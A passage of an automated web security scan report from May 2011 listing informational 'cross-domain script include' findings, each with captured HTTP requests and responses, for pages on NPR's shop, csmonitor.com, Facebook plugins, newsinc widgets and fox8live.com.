Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=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; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
Set-Cookie: C2=kpAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NXAcLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981604/cstr=46632794=_4dc80a64,1210252042,786652^981604^1183^0,1_/xsxdata=$xsxdata/bnum=46632794/optn=64?trg="><\/script>
...[SNIP]...

18.17. http://shop.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
...[SNIP]...

18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /spoken-word/npr-american-chronicles-the-civil-war/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spoken-word/npr-american-chronicles-the-civil-war/ HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:21 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32761

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<img src="http://ems.alm75.com/images/ssl.gif" height="95" width="189" /> -->
<script type="text/javascript" src="https://seal.thawte.com/getthawteseal?host_name=shop.npr.org&amp;size=M&amp;lang=en"></script>
...[SNIP]...

18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_ent.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_ent.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: xrd5EU4/EYn6CTm0B/vP2iQIA6dBwpgKjKWeRZC+oEEGYG0YFoO6lB+X8Z/+HPFU
x-amz-request-id: AF2245DF46085C33
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:12 GMT
ETag: "e37d02b72a512e6197bb14989afa39e4"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3912
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_lif.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_lif.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: mEOu32vR3E8tGAEaHsutA96sOnZ22m8JXDTAo9TgtZ+QfkETrm1I3n8NvgsmlsX5
x-amz-request-id: B6265CA3FA21C90F
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:13 GMT
ETag: "2d3fcc84fd4ca454bafe287c3f3d378b"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3911
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_spt.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_spt.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: jWviZDOs0B4w7K/QrBoQmmdDSBNN6gaRL6P6fjh5xQNFERkJvxXtOVd42p+LcQhk
x-amz-request-id: 02B557D041C2B130
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:15 GMT
ETag: "55a56750cbd83fb936648ff65382db00"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3912
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /_fw/therepublic/toppicks_republic_wld.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_fw/therepublic/toppicks_republic_wld.html HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: gh+tubFkRxyuKRBuISKEJt/yHAG0agTrpksbN82KyOaIvE0wxm8hOrhWbdH91ktL
x-amz-request-id: DA67803AA0B0C91B
Date: Mon, 09 May 2011 15:37:39 GMT
x-amz-meta-cb-modifiedtime: Thu, 10 Feb 2011 00:57:25 GMT
Last-Modified: Thu, 10 Feb 2011 01:18:18 GMT
ETag: "7406d66633c62f50d2de6d0cfb16c4a3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3911
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>NDN Top Picks
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/partnerMarketsIntradaySnap.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1EE0F56D53B8C87B4B0244807F4A5FA6

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8641

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 strict//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<HTML>
<HEAD>
   

<link href="http://cdn.macroaxis.netdna-cdn.com/skins/minimum.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://cdn.macroaxis.netdna-cdn.com/scripts/minimum.js"></script>
...[SNIP]...

18.24. http://www.csmonitor.com/Business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Business HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=19
Expires: Mon, 09 May 2011 15:35:12 GMT
Date: Mon, 09 May 2011 15:34:53 GMT
Connection: close
Content-Length: 83875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


        <title> B
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-70a4ef81fd680189295c07709c488bca-637330399c4b4cfb742d6605953b851d">
               <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
                       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...
</script>    <script src="http://cdn.media6degrees.com/static/cs6169.js" type="text/javascript"></script>
...[SNIP]...

18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=73
Expires: Mon, 09 May 2011 15:39:13 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close
Content-Length: 74098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


    <title> Ga
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-fafd3a41deed04064c02b92b8a53809f-dd7b0974c0bc3b7de373673bea2560f5">
               <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
                       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...
</script>    <script src="http://cdn.media6degrees.com/static/cs6169.js" type="text/javascript"></script>
...[SNIP]...

18.26. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.34
X-Cnection: close
Date: Mon, 09 May 2011 15:35:06 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

18.27. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

18.28. http://www.fox8live.com/business/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
